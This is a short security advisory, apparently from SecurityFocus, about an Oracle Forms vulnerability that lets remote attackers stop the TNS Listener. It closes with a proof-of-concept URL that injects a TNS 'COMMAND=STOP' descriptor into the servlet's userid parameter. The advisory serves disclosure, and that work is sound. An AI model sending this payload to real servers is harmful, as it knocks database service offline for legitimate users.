11 lines
No EOL
940 B
Text
11 lines
No EOL
940 B
Text
source: https://www.securityfocus.com/bid/15039/info
|
|
|
|
Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
|
|
|
|
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
|
|
|
|
This issue was reported in Oracle Forms versions prior to July 2005.
|
|
|
|
This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID.
|
|
|
|
http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES |